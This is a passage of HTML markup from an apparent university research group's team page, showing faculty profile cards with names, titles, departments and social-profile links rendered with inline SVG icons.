0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c16-outer\">\n            <div data-colibri-id=\"182-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c17\" class=\"d-block style-980 style-local-182-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg\" class=\"wp-image-692 style-980-image style-local-182-c17-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c17-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c18\" class=\"h-global-transition-all h-heading style-974 style-local-182-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c18\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raj Sunderraman</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c19\" class=\"h-text h-text-component style-975 style-local-182-c19 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Chair and Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c20\" class=\"h-text h-text-component style-976 style-local-182-c20 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c21\" class=\"style-981 style-local-182-c21 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?hl=en&amp;user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c22-outer\">\n            <div data-colibri-id=\"182-c22\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c23\" class=\"d-block style-982 style-local-182-c23 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-SRM-360x360-1.png\" class=\"wp-image-1601 style-982-image style-local-182-c23-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c23-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c24\" class=\"h-global-transition-all h-heading style-974 style-local-182-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c24\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c25\" class=\"h-text h-text-component style-975 style-local-182-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Research Associate Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c26\" class=\"h-text h-text-component style-976 style-local-182-c26 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Population Health Sciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c27\" class=\"style-983 style-local-182-c27 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c40-outer\">\n            <div data-colibri-id=\"182-c40\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c41\" class=\"d-block style-973 style-local-182-c41 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg\" class=\"wp-image-704 style-973-image style-local-182-c41-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c41-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c42\" class=\"h-global-transition-all h-heading style-974 style-local-182-c42 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c42\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Zelikovsky</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c43\" class=\"h-text h-text-component style-975 style-local-182-c43 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Distinguished University Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c44\" class=\"h-text h-text-component style-976 style-local-182-c44 position-relative h-element\">\n                  